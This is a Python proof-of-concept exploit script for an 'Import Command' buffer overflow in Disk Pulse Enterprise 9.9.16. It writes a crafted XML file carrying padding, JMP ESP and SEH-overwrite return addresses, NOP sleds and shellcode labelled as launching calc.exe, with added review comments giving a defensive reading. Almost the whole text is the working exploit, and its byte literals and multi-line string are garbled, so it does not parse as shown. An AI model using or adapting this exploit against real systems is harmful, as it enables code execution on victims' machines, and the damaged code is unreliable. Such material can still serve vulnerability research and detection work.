#!/usr/bin/python
# Exploit Title : Disk Pulse Enterprise 9.9.16 - 'Import Command' Buffer Overflow
# Discovery by : Anurag Srivastava
# Email : anurag.srivastava@pyramidcyber.com
# Website : www.pyramidcyber.com
# Discovery Date : 21/08/2017
# Software Link : http://www.diskpulse.com/setups/diskpulseent_setup_v9.9.16.exe
# Tested Version : 9.9.16
# Tested on OS : Windows 7 Ultimate x64bit and Windows 10 Home Edition x64
# Steps to Reproduce: Run the python file to generate pyramid.xml, then open the Disk Pulse software, right-click and click on Import Command, and select the pyramid.xml file.
import os,struct
# NOTE(review): proof-of-concept listing for the overflow named in the header above.
# Defensive reading: the script's only effect is to write pyramid.xml, whose
# <classify> element carries an oversized `name` attribute; until a vendor fix is
# confirmed, importing XML files from untrusted sources into the affected version
# should be treated as unsafe, and an import file with an attribute value of this
# size is a reasonable thing to flag.
# NOTE(review): the quoted byte-string literals below and the multi-line `file`
# literal do not parse as Python as shown — the page appears to have been damaged
# in extraction. They are left byte-identical here.
# `struct` packs the two 32-bit little-endian addresses below; `os` is imported
# but never used in this listing.
#offset to eip
junk = "A" * (1560)
#JMP ESP (QtGui4.dll)
jmp1 = struct.pack('<L',0x651bb77a)
#NOPS
nops = "x90"
#LEA EAX, [ESP+76]
esp = "x8Dx44x24x4c"
#JMP ESP
jmp2 = "xFFxE0"
#JMP Short
nseh = "x90x90xEBx05" #Jump short 5
#POP POP RET (libspp.dll)
# The nseh/seh pair and the "POP POP RET" label indicate an SEH-overwrite style
# payload; the addresses are specific to the module and version named in the header.
seh = struct.pack('<L',0x10015FFE)
#CALC.EXE
# Payload bytes; the original comment labels them as launching calc.exe (a
# harmless proof-of-concept marker). Not verified here.
shellcode = "x31xdbx64x8bx7bx30x8bx7fx0cx8bx7fx1cx8bx47x08x8bx77x20x8bx3fx80x7ex0cx33x75xf2x89xc7x03x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x89xddx8bx34xafx01xc6x45x81x3ex43x72x65x61x75xf2x81x7ex08x6fx63x65x73x75xe9x8bx7ax24x01xc7x66x8bx2cx6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x89xd9xb1xffx53xe2xfdx68x63x61x6cx63x89xe2x52x52x53x53x53x53x53x53x52x53xffxd7"
# FINAL PAYLOAD
# Concatenation order: filler, first return address, NOP sled, register setup,
# second jump, NOP sled, nSEH, SEH handler address, NOP sled, payload.
evil = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 64 + nseh + seh + nops * 10 + shellcode
#FILE
# The XML wrapper: `evil` becomes the value of the `name` attribute. Note that
# `file` shadows a Python 2 builtin; a different local name would be clearer.
file='<?xml version="1.0" encoding="UTF-8"?>
<classify
name='' + evil + '
</classify>'
# Writes pyramid.xml into the current working directory; a `with open(...)`
# block would close the handle automatically, but the explicit close is kept.
f = open('pyramid.xml', 'w')
f.write(file)
f.close()
Disk Pulse Enterprise 9.9.16 Buffer Overflow